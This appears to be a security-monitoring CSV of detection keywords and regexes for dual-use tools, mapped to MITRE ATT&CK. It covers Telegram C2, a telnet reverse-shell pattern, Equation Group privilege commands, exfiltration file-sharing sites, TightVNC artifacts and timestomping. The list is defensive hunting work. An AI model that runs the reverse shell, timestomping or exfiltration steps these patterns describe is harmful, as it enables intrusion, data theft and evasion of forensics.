"*api.telegram.org*",".{0,1000}api\.telegram\.org.{0,1000}","greyware_tool_keyword","telegram","telegram API usage -given the increasing adoption of Telegram by malware for command and control (C2) operations. it's essential to monitor and restrict its usage within corporate networks and on company devices","T1071.004 - T1102 - T1047","TA0011 - TA0002 - TA0005","N/A","N/A","C2","api.telegram.org","0","1","N/A","High False positive Risk !","1","9","N/A","N/A","N/A","N/A"
"*https://api.telegram.org/bot*/sendMessage*",".{0,1000}https\:\/\/api\.telegram\.org\/bot.{0,1000}\/sendMessage.{0,1000}","greyware_tool_keyword","TelegramRAT","Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions","T1071.001 - T1105 - T1027","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/machine1337/TelegramRAT","1","1","N/A","N/A","10","10","322","47","2024-01-23T12:05:59Z","2023-06-30T10:59:55Z"
"*&& telnet * 2>&1 </dev/console*",".{0,1000}\&\&\stelnet\s.{0,1000}\s2\>\&1\s\<\/dev\/console.{0,1000}","greyware_tool_keyword","telnet","suspicious shell commands used in various Equation Group scripts and tools","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","C2","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_apt_equationgroup_lnx.yml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","8034","2149","2024-08-29T18:41:50Z","2016-12-24T09:48:49Z"
"*telnet * | /bin/bash | telnet *",".{0,1000}telnet\s.{0,1000}\s\|\s\/bin\/bash\s\|\stelnet\s.{0,1000}","greyware_tool_keyword","telnet","telnet reverse shell ","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","C2","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","N/A","greyware tool - risks of False positive !","N/A","10","59490","14395","2024-08-26T09:29:03Z","2016-10-18T07:29:07Z"
"*http://temp.sh/*/*",".{0,1000}https\:\/\/temp\.sh\/.{0,1000}\/.{0,1000}","greyware_tool_keyword","temp.sh","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","N/A","Collection","https://twitter.com/mthcht/status/1660953897622544384","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*https://temp.sh/*/*",".{0,1000}https\:\/\/temp\.sh\/.{0,1000}\/.{0,1000}","greyware_tool_keyword","temp.sh","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","N/A","Collection","https://twitter.com/mthcht/status/1660953897622544384","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*https://temp.sh/upload*",".{0,1000}https\:\/\/temp\.sh\/upload.{0,1000}","greyware_tool_keyword","temp.sh","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","N/A","Data Exfiltration","https://twitter.com/mthcht/status/1660953897622544384","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*https://privatix-temp-mail-v1.p.rapidapi.com/request/domains/*",".{0,1000}https\:\/\/privatix\-temp\-mail\-v1\.p\.rapidapi\.com\/request\/domains\/.{0,1000}","greyware_tool_keyword","temp-mail","using the API of a disposable email address to use anytime - could be abused by malicious actors","T1071.003","TA0005 - TA0001","N/A","N/A","Defense Evasion","temp-mail.org","1","1","N/A","api doc https://rapidapi.com/Privatix/api/temp-mail","9","10","N/A","N/A","N/A","N/A"
"*https://privatix-temp-mail-v1.p.rapidapi.com/request/mail/id/null/*",".{0,1000}https\:\/\/privatix\-temp\-mail\-v1\.p\.rapidapi\.com\/request\/mail\/id\/null\/.{0,1000}","greyware_tool_keyword","temp-mail","using the API of a disposable email address to use anytime - could be abused by malicious actors","T1071.003","TA0005 - TA0001","N/A","N/A","Defense Evasion","temp-mail.org","1","1","N/A","api doc https://rapidapi.com/Privatix/api/temp-mail","9","10","N/A","N/A","N/A","N/A"
"*https://tempsend.com/*",".{0,1000}https\:\/\/tempsend\.com\/.{0,1000}","greyware_tool_keyword","tempsend.com","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","N/A","Collection","https://twitter.com/mthcht/status/1660953897622544384","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*https://tempsend.com/send*",".{0,1000}https\:\/\/tempsend\.com\/send.{0,1000}","greyware_tool_keyword","tempsend.com","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","N/A","Data Exfiltration","https://twitter.com/mthcht/status/1660953897622544384","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*https://textbin.net/raw/*",".{0,1000}https\:\/\/textbin\.net\/raw\/.{0,1000}","greyware_tool_keyword","textbin.net","textbin.net raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","textbin.net","1","1","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*knmmpciebaoojcpjjoeonlcjacjopcpf*",".{0,1000}knmmpciebaoojcpjjoeonlcjacjopcpf.{0,1000}","greyware_tool_keyword","Thunder Proxy","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"* -service TightVNC Server*",".{0,1000}\s\-service\sTightVNC\sServer.{0,1000}","greyware_tool_keyword","tightvnc","TightVNC is a free and Open Source remote desktop software that lets you access and control a computer over the network - often abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.tightvnc.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*.\TightVNC1*",".{0,1000}\.\\TightVNC1.{0,1000}","greyware_tool_keyword","tightvnc","TightVNC is a free and Open Source remote desktop software that lets you access and control a computer over the network - often abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.tightvnc.com","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*.\TightVNC2*",".{0,1000}\.\\TightVNC2.{0,1000}","greyware_tool_keyword","tightvnc","TightVNC is a free and Open Source remote desktop software that lets you access and control a computer over the network - often abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.tightvnc.com","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*.\TightVNC3*",".{0,1000}\.\\TightVNC3.{0,1000}","greyware_tool_keyword","tightvnc","TightVNC is a free and Open Source remote desktop software that lets you access and control a computer over the network - often abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.tightvnc.com","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*/tightvnc-*.msi*",".{0,1000}\/tightvnc\-.{0,1000}\.msi.{0,1000}","greyware_tool_keyword","tightvnc","TightVNC is a free and Open Source remote desktop software that lets you access and control a computer over the network - often abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.tightvnc.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\mlnhcpkomdeavomsjalt*",".{0,1000}\\mlnhcpkomdeavomsjalt.{0,1000}","greyware_tool_keyword","tightvnc","TightVNC is a free and Open Source remote desktop software that lets you access and control a computer over the network - often abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.tightvnc.com","1","0","N/A","named pipe https://github.com/mthcht/awesome-lists/blob/9080701200e4f9f2e523bee7cde7b335121b1cb2/Lists/suspicious_named_pipe_list.csv#L2","10","10","N/A","N/A","N/A","N/A"
"*\Programs\TightVNC*",".{0,1000}\\Programs\\TightVNC.{0,1000}","greyware_tool_keyword","tightvnc","TightVNC is a free and Open Source remote desktop software that lets you access and control a computer over the network - often abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.tightvnc.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\SOFTWARE\WOW6432Node\TightVNC\*",".{0,1000}\\SOFTWARE\\WOW6432Node\\TightVNC\\.{0,1000}","greyware_tool_keyword","tightvnc","TightVNC is a free and Open Source remote desktop software that lets you access and control a computer over the network - often abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.tightvnc.com","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*\TightVNC Server*",".{0,1000}\\TightVNC\sServer.{0,1000}","greyware_tool_keyword","tightvnc","TightVNC is a free and Open Source remote desktop software that lets you access and control a computer over the network - often abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.tightvnc.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\tightvnc-*",".{0,1000}\\tightvnc\-.{0,1000}","greyware_tool_keyword","tightvnc","TightVNC is a free and Open Source remote desktop software that lets you access and control a computer over the network - often abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.tightvnc.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\TightVNC_Service_Control*",".{0,1000}\\TightVNC_Service_Control.{0,1000}","greyware_tool_keyword","tightvnc","TightVNC is a free and Open Source remote desktop software that lets you access and control a computer over the network - often abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.tightvnc.com","1","0","N/A","named pipe https://github.com/mthcht/awesome-lists/blob/9080701200e4f9f2e523bee7cde7b335121b1cb2/Lists/suspicious_named_pipe_list.csv#L2","10","10","N/A","N/A","N/A","N/A"
"*\TVN_log_pipe_public_name*",".{0,1000}\\TVN_log_pipe_public_name.{0,1000}","greyware_tool_keyword","tightvnc","TightVNC is a free and Open Source remote desktop software that lets you access and control a computer over the network - often abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.tightvnc.com","1","0","N/A","named pipe https://github.com/mthcht/awesome-lists/blob/9080701200e4f9f2e523bee7cde7b335121b1cb2/Lists/suspicious_named_pipe_list.csv#L2","10","10","N/A","N/A","N/A","N/A"
"*>TightVNC Viewer<*",".{0,1000}\>TightVNC\sViewer\<.{0,1000}","greyware_tool_keyword","tightvnc","TightVNC is a free and Open Source remote desktop software that lets you access and control a computer over the network - often abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.tightvnc.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*00:\.vnc\*",".{0,1000}00\:\\\.vnc\\.{0,1000}","greyware_tool_keyword","tightvnc","TightVNC is a free and Open Source remote desktop software that lets you access and control a computer over the network - often abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.tightvnc.com","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*GlavSoft LLC.*",".{0,1000}GlavSoft\sLLC\..{0,1000}","greyware_tool_keyword","tightvnc","TightVNC is a free and Open Source remote desktop software that lets you access and control a computer over the network - often abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.tightvnc.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*HKCR\.vnc*",".{0,1000}HKCR\\\.vnc.{0,1000}","greyware_tool_keyword","tightvnc","TightVNC is a free and Open Source remote desktop software that lets you access and control a computer over the network - often abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.tightvnc.com","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*program files (x86)\tightvnc\*",".{0,1000}program\sfiles\s\(x86\)\\tightvnc\\.{0,1000}","greyware_tool_keyword","tightvnc","TightVNC is a free and Open Source remote desktop software that lets you access and control a computer over the network - often abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.tightvnc.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ProgramData\TightVNC*",".{0,1000}ProgramData\\TightVNC.{0,1000}","greyware_tool_keyword","tightvnc","TightVNC is a free and Open Source remote desktop software that lets you access and control a computer over the network - often abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.tightvnc.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*TightVNC Service*",".{0,1000}TightVNC\sService.{0,1000}","greyware_tool_keyword","tightvnc","TightVNC is a free and Open Source remote desktop software that lets you access and control a computer over the network - often abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.tightvnc.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*TightVNC Web Site.url*",".{0,1000}TightVNC\sWeb\sSite\.url.{0,1000}","greyware_tool_keyword","tightvnc","TightVNC is a free and Open Source remote desktop software that lets you access and control a computer over the network - often abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.tightvnc.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*tvnserver*",".{0,1000}tvnserver.{0,1000}","greyware_tool_keyword","tightvnc","TightVNC is a free and Open Source remote desktop software that lets you access and control a computer over the network - often abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.tightvnc.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*tvnserver.exe*",".{0,1000}tvnserver\.exe.{0,1000}","greyware_tool_keyword","tightvnc","TightVNC is a free and Open Source remote desktop software that lets you access and control a computer over the network - often abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.tightvnc.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*tvnviewer.exe*",".{0,1000}tvnviewer\.exe.{0,1000}","greyware_tool_keyword","tightvnc","TightVNC is a free and Open Source remote desktop software that lets you access and control a computer over the network - often abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.tightvnc.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*VncViewer.Config*",".{0,1000}VncViewer\.Config.{0,1000}","greyware_tool_keyword","tightvnc","TightVNC is a free and Open Source remote desktop software that lets you access and control a computer over the network - often abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.tightvnc.com","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*www.tightvnc.com/download/*=",".{0,1000}www\.tightvnc\.com\/download\/.{0,1000}\=","greyware_tool_keyword","tightvnc","TightVNC is a free and Open Source remote desktop software that lets you access and control a computer over the network - often abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.tightvnc.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\tir_blanc_holiseum\*.exe*",".{0,1000}\\tir_blanc_holiseum\\.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","tir_blanc_holiseum","Ransomware simulation","T1486 - T1204 - T1027 - T1059","TA0040 - TA0002 - TA0005","N/A","N/A","Ransomware","https://www.holiseum.com/services/auditer/tir-a-blanc-ransomware","1","0","N/A","N/A","4","6","N/A","N/A","N/A","N/A"
"*kindloader.exe* --extract kindlocker*",".{0,1000}kindloader\.exe.{0,1000}\s\-\-extract\skindlocker.{0,1000}","greyware_tool_keyword","tir_blanc_holiseum","Ransomware simulation","T1486 - T1204 - T1027 - T1059","TA0040 - TA0002 - TA0005","N/A","N/A","Ransomware","https://www.holiseum.com/services/auditer/tir-a-blanc-ransomware","1","0","N/A","N/A","4","6","N/A","N/A","N/A","N/A"
"*https://tmpfiles.org/dl/*.exe*",".{0,1000}https\:\/\/tmpfiles\.org\/dl\/.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","tmpfiles.org","download of an executable files from tmpfiles.org often used by ransomware groups","T1566.002 - T1192 - T1105","TA0001 - TA0002","N/A","N/A","Collection","N/A","1","1","N/A","greyware tool - risk of false positive !","10","10","N/A","N/A","N/A","N/A"
"*chmod 4777 /tmp/.scsi/dev/bin/gsh*",".{0,1000}chmod\s4777\s\/tmp\/\.scsi\/dev\/bin\/gsh.{0,1000}","greyware_tool_keyword","tmpwatch","Equation Group hack tool set command exploitation- tmpwatch - removes files which haven't been accessed for a period of time","T1070.004 - T1059 - T1047","TA0007 - TA0002 - TA0040","N/A","N/A","Malware","https://linux.die.net/man/8/tmpwatch","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*chown root:root /tmp/.scsi/dev/bin/*",".{0,1000}chown\sroot\:root\s\/tmp\/\.scsi\/dev\/bin\/.{0,1000}","greyware_tool_keyword","tmpwatch","Equation Group hack tool set command exploitation- tmpwatch - removes files which haven't been accessed for a period of time","T1070.004 - T1059 - T1047","TA0007 - TA0002 - TA0040","N/A","N/A","Malware","https://linux.die.net/man/8/tmpwatch","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*echo *bailing. try a different name\*",".{0,1000}echo\s.{0,1000}bailing\.\stry\sa\sdifferent\sname\\.{0,1000}","greyware_tool_keyword","tmpwatch","Equation Group hack tool set command exploitation- tmpwatch - removes files which haven't been accessed for a period of time","T1070.004 - T1059 - T1047","TA0007 - TA0002 - TA0040","N/A","N/A","Malware","https://linux.die.net/man/8/tmpwatch","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*if [ -f /tmp/tmpwatch ] * then*",".{0,1000}if\s\[\s\-f\s\/tmp\/tmpwatch\s\]\s.{0,1000}\sthen.{0,1000}","greyware_tool_keyword","tmpwatch","Equation Group hack tool set command exploitation- tmpwatch - removes files which haven't been accessed for a period of time","T1070.004 - T1059 - T1047","TA0007 - TA0002 - TA0040","N/A","N/A","Malware","https://linux.die.net/man/8/tmpwatch","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*\AppData\Local\CoreAIPlatform.00\UKP\*\ukg.db*",".{0,1000}\\AppData\\Local\\CoreAIPlatform\.00\\UKP\\.{0,1000}\\ukg\.db.{0,1000}","greyware_tool_keyword","TotalRecall","extracts and displays data from the Recall feature in Windows 11","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/xaitax/TotalRecall","1","0","N/A","will trigger if the recall is enable on the computer","5","10","1956","152","2024-06-08T09:25:08Z","2024-06-03T16:38:04Z"
"*touch -a*",".{0,1000}touch\s\-a.{0,1000}","greyware_tool_keyword","touch","Timestomping is an anti-forensics technique which is used to modify the timestamps of a file* often to mimic files that are in the same folder.","T1070.006 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_timestomp_touch.toml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","1882","482","2024-08-29T19:24:49Z","2020-06-17T21:48:18Z"
"*touch -m*",".{0,1000}touch\s\-m.{0,1000}","greyware_tool_keyword","touch","Timestomping is an anti-forensics technique which is used to modify the timestamps of a file* often to mimic files that are in the same folder.","T1070.006 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_timestomp_touch.toml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","1882","482","2024-08-29T19:24:49Z","2020-06-17T21:48:18Z"
"*touch -r *",".{0,1000}touch\s\-r\s.{0,1000}","greyware_tool_keyword","touch","Timestomping is an anti-forensics technique which is used to modify the timestamps of a file* often to mimic files that are in the same folder.","T1070.006 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_timestomp_touch.toml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","1882","482","2024-08-29T19:24:49Z","2020-06-17T21:48:18Z"
"*touch -t *",".{0,1000}touch\s\-t\s.{0,1000}","greyware_tool_keyword","touch","Timestomping is an anti-forensics technique which is used to modify the timestamps of a file* often to mimic files that are in the same folder.","T1070.006 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_timestomp_touch.toml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","1882","482","2024-08-29T19:24:49Z","2020-06-17T21:48:18Z"
"*bihmplhobchoageeokmgbdihknkjbknd*",".{0,1000}bihmplhobchoageeokmgbdihknkjbknd.{0,1000}","greyware_tool_keyword","Touch VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*https://transfer.sh*",".{0,1000}https\:\/\/transfer\.sh.{0,1000}","greyware_tool_keyword","transfer.sh","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","N/A","Data Exfiltration","https://twitter.com/mthcht/status/1660953897622544384","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*https://transfert-my-files.com/files/*",".{0,1000}https\:\/\/transfert\-my\-files\.com\/files\/.{0,1000}","greyware_tool_keyword","transfert-my-files.com","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","N/A","Collection","https://twitter.com/mthcht/status/1660953897622544384","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*https://transfert-my-files.com/inc/upload.php*",".{0,1000}https\:\/\/transfert\-my\-files\.com\/inc\/upload\.php.{0,1000}","greyware_tool_keyword","transfert-my-files.com","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","N/A","Data Exfiltration","https://twitter.com/mthcht/status/1660953897622544384","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*https://github-com.translate.goog/*",".{0,1000}https\:\/\/github\-com\.translate\.goog\/.{0,1000}","greyware_tool_keyword","translate.goog","accessing github through google translate (evasion) false positive risk","T1090.003","TA0005","N/A","N/A","Defense Evasion","https://*-com.translate.goog/*","0","1","N/A","N/A","1","3","N/A","N/A","N/A","N/A"
"*njpmifchgidinihmijhcfpbdmglecdlb*",".{0,1000}njpmifchgidinihmijhcfpbdmglecdlb.{0,1000}","greyware_tool_keyword","Trellonet Trellonet","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"* the servers Wireguard interface.*",".{0,1000}\sthe\sservers\sWireguard\sinterface\..{0,1000}","greyware_tool_keyword","tunnel","SSL-terminated ephemeral HTTP tunnels to your local machine","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://gitlab.com/pyjam.as/tunnel","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*.tunnel.pyjam.as*",".{0,1000}\.tunnel\.pyjam\.as.{0,1000}","greyware_tool_keyword","tunnel","SSL-terminated ephemeral HTTP tunnels to your local machine","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://gitlab.com/pyjam.as/tunnel","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*// Package tunnel is a server/client package that enables to proxy public*",".{0,1000}\/\/\sPackage\stunnel\sis\sa\sserver\/client\spackage\sthat\senables\sto\sproxy\spublic.{0,1000}","greyware_tool_keyword","tunnel","Tunnel is a server/client package that enables to proxy public connections to your local machine over a tunnel connection from the local machine to the public server. What this means is, you can share your localhost even if it doesn't have a Public IP or if it's not reachable from outside","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/koding/tunnel","1","0","N/A","N/A","10","10","319","71","2023-10-20T13:43:58Z","2015-05-28T07:26:42Z"
"*/etc/wireguard/*.conf*",".{0,1000}\/etc\/wireguard\/.{0,1000}\.conf.{0,1000}","greyware_tool_keyword","tunnel","Tunnel is a server/client package that enables to proxy public connections to your local machine over a tunnel connection from the local machine to the public server. What this means is, you can share your localhost even if it doesn't have a Public IP or if it's not reachable from outside","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/koding/tunnel","1","0","N/A","N/A","10","10","319","71","2023-10-20T13:43:58Z","2015-05-28T07:26:42Z"
"*/etc/wireguard/*.conf*",".{0,1000}\/etc\/wireguard\/.{0,1000}\.conf.{0,1000}","greyware_tool_keyword","tunnel","SSL-terminated ephemeral HTTP tunnels to your local machine","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://gitlab.com/pyjam.as/tunnel","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/pyjam.as/tunnel*",".{0,1000}\/pyjam\.as\/tunnel.{0,1000}","greyware_tool_keyword","tunnel","SSL-terminated ephemeral HTTP tunnels to your local machine","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://gitlab.com/pyjam.as/tunnel","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/tunnel/server.go*",".{0,1000}\/tunnel\/server\.go.{0,1000}","greyware_tool_keyword","tunnel","Tunnel is a server/client package that enables to proxy public connections to your local machine over a tunnel connection from the local machine to the public server. What this means is, you can share your localhost even if it doesn't have a Public IP or if it's not reachable from outside","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/koding/tunnel","1","0","N/A","N/A","10","10","319","71","2023-10-20T13:43:58Z","2015-05-28T07:26:42Z"
"*/tunnel/tunnel.py*",".{0,1000}\/tunnel\/tunnel\.py.{0,1000}","greyware_tool_keyword","tunnel","SSL-terminated ephemeral HTTP tunnels to your local machine","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://gitlab.com/pyjam.as/tunnel","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/tunnel/tunnel.service*",".{0,1000}\/tunnel\/tunnel\.service.{0,1000}","greyware_tool_keyword","tunnel","SSL-terminated ephemeral HTTP tunnels to your local machine","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://gitlab.com/pyjam.as/tunnel","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/tunnel-main.tar.gz*",".{0,1000}\/tunnel\-main\.tar\.gz.{0,1000}","greyware_tool_keyword","tunnel","SSL-terminated ephemeral HTTP tunnels to your local machine","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://gitlab.com/pyjam.as/tunnel","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*3579ab708388d7be3e66c1a45deea0f6a249865ce4105310d8fe340ed28accca*",".{0,1000}3579ab708388d7be3e66c1a45deea0f6a249865ce4105310d8fe340ed28accca.{0,1000}","greyware_tool_keyword","tunnel","Tunnel is a server/client package that enables to proxy public connections to your local machine over a tunnel connection from the local machine to the public server. What this means is, you can share your localhost even if it doesn't have a Public IP or if it's not reachable from outside","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/koding/tunnel","1","0","#filehash","N/A","10","10","319","71","2023-10-20T13:43:58Z","2015-05-28T07:26:42Z"
"*447a5e8b424ebc3b82e909ab8c585fda579881ad26c35cba3c32b77896008c62*",".{0,1000}447a5e8b424ebc3b82e909ab8c585fda579881ad26c35cba3c32b77896008c62.{0,1000}","greyware_tool_keyword","tunnel","SSL-terminated ephemeral HTTP tunnels to your local machine","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://gitlab.com/pyjam.as/tunnel","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A"
